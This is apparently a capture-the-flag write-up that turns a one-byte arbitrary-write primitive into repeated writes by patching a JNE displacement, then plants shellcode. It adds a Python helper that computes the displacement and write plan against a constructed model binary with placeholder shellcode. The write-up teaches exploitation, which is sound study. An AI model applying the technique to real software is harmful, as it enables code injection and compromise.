In main() right after the typical calls to setvbuf for STDIN and STDOUT we have a setup function.
setup changes the protections of the .text, .data and .bss sections to read, write and execute (RWX), so the code of the binary itself can be overwritten at runtime.
The function called after setup is butterflySwag. It takes two inputs, an address and a one-byte value, writes that byte to the address we specify and returns.
So we have a one-byte patch anywhere in the binary, including the .text segment. Of course we can't get a shell with a single byte, so let's turn it into a way to get more bytes in. One of the if statements that follow is conveniently close to the code that takes the input, and they are all short conditional jumps: a one-byte opcode (0x75 for JNE) followed by a one-byte signed displacement, measured from the end of the two-byte instruction. So we can patch the displacement of the first if statement with a negative value to jump back to the input code whenever byte != 0.
After calculating the negative distance to jump back, the disassembly looks like this:
Now that we can patch an unlimited number of bytes as long as byte != 0, let's write shellcode byte by byte right after the conditional jump (where execution falls through once the loop ends) and leave the loop by sending byte == 0.
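To make the displacement arithmetic and the write order concrete, here is an added example (not code from the writeup, and not the challenge binary) that computes the rel8 byte for the backward JNE, lists the (address, byte) writes to send to the one-byte primitive, and checks the result against a constructed model of the patched loop. The addresses 0x401200 and 0x4011e0, the text bytes and the three-byte "shellcode" are made up for the example; the model loop stops at the first zero byte, as the writeup describes.

```python
JNE_SHORT = 0x75  # opcode of the two-byte "jne rel8" encoding


def rel8(jump_addr: int, target: int) -> int:
    """Signed 8-bit displacement for a short jump at jump_addr landing on target.

    rel8 is measured from the end of the two-byte instruction (jump_addr + 2),
    not from the opcode byte, so a backward jump needs disp = target - (jump + 2).
    """
    disp = target - (jump_addr + 2)
    if not -128 <= disp <= 127:
        raise ValueError(f"target {target:#x} is {disp} bytes away, outside rel8 range")
    return disp & 0xFF


def encode_jne_short(jump_addr: int, target: int) -> bytes:
    """Full two-byte encoding, handy for comparing with the patched disassembly."""
    return bytes([JNE_SHORT, rel8(jump_addr, target)])


def build_write_plan(jne_addr: int, loop_entry: int, shellcode: bytes):
    """(address, byte) pairs in the order they must be sent to the one-byte write.

    1. Only the displacement byte (jne_addr + 1) changes; the 0x75 opcode stays.
    2. Shellcode goes right after the jne, where execution falls through when the
       loop ends, so its base is jne_addr + 2.
    3. A final 0 byte ends the loop. Because every byte is written before the
       byte != 0 check, the shellcode itself must be NUL-free.
    """
    if b"\x00" in shellcode:
        raise ValueError("shellcode must be NUL-free: the first 0 byte ends the loop")
    base = jne_addr + 2
    plan = [(jne_addr + 1, rel8(jne_addr, loop_entry))]
    plan += [(base + i, b) for i, b in enumerate(shellcode)]
    plan.append((base + len(shellcode), 0))  # harmless byte after the shellcode
    return plan


def run_patched_loop(text_base: int, text: bytes, plan) -> bytes:
    """Constructed model of the patched binary, not the real one: apply each write,
    then re-enter the loop only while the written byte is non-zero."""
    mem = bytearray(text)
    for addr, val in plan:
        mem[addr - text_base] = val
        if val == 0:
            break
    return bytes(mem)


# Example addresses (assumed, not from the challenge): the jne sits at 0x401200
# and the input code it must jump back to starts at 0x4011e0.
JNE_ADDR = 0x401200
LOOP_ENTRY = 0x4011E0
TEXT_BASE = 0x4011E0
# Constructed .text image: 0x20 bytes of nops, the original "jne +5", more nops.
TEXT = b"\x90" * 0x20 + b"\x75\x05" + b"\x90" * 0x0E
SHELLCODE = b"\x90\x90\xcc"  # placeholder bytes standing in for real shellcode


def demo() -> bytes:
    plan = build_write_plan(JNE_ADDR, LOOP_ENTRY, SHELLCODE)
    return run_patched_loop(TEXT_BASE, TEXT, plan)


if __name__ == "__main__":
    print("patched jne:", encode_jne_short(JNE_ADDR, LOOP_ENTRY).hex())
    for addr, val in build_write_plan(JNE_ADDR, LOOP_ENTRY, SHELLCODE):
        print(f"write {val:#04x} -> {addr:#x}")
    print("text after loop:", demo()[0x20:0x26].hex())
```

With these addresses the displacement comes out as 0x4011e0 - 0x401202 = -0x22, so the patched instruction reads 75 de, and the bytes following it in the model end up as the shellcode followed by the terminating zero. The NUL-free requirement is the caveat to keep in mind when choosing real shellcode for this primitive.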